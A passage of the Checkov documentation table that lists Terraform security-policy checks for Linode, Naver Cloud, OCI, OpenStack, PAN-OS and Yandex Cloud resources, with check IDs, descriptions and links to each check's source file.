[authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | -| 1967 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | -| 1968 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | 
[user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | -| 1969 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | -| 1970 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | -| 1971 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | -| 1972 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 1973 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | -| 1974 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | -| 1975 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 
0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | -| 1976 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | -| 1977 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | -| 1978 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | -| 1979 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | -| 1980 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | -| 1981 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | -| 1982 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | 
[NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | -| 1983 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | -| 1984 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | -| 1985 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | -| 1986 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | -| 1987 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | -| 1988 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 1989 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | -| 1990 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | -| 1991 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | -| 1992 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | -| 1993 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 1994 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | -| 1995 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | -| 1996 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | -| 1997 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | -| 1998 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | -| 1999 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | -| 2000 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | -| 2001 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | -| 2002 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | -| 2003 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | -| 2004 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | -| 2005 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | -| 2006 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | -| 2007 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | -| 2008 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | -| 2009 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | -| 2010 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | -| 2011 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | -| 2012 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | -| 2013 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | -| 2014 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | -| 2015 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | -| 2016 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | -| 2017 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | -| 2018 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | -| 2019 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | -| 2020 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | -| 2021 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2022 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2023 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | -| 2024 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | -| 2025 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | -| 2026 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | -| 2027 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | -| 2028 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | -| 2029 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | -| 2030 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 2031 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 2032 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 2033 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 2034 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | 
Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | -| 2035 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | -| 2036 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | -| 2037 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | -| 2038 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | -| 2039 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 2040 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 2041 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | 
[PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2042 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2043 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2044 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2045 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2046 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2047 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2048 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within 
security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2049 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2050 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2051 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2052 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2053 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2054 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 2055 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec 
profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2056 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 2057 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2058 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 2059 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2060 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2061 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 2062 | CKV_PAN_15 | resource | 
panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2063 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 2064 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 2065 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2066 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2067 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2068 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2069 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2070 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2071 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2072 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2073 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 2074 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 2075 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | 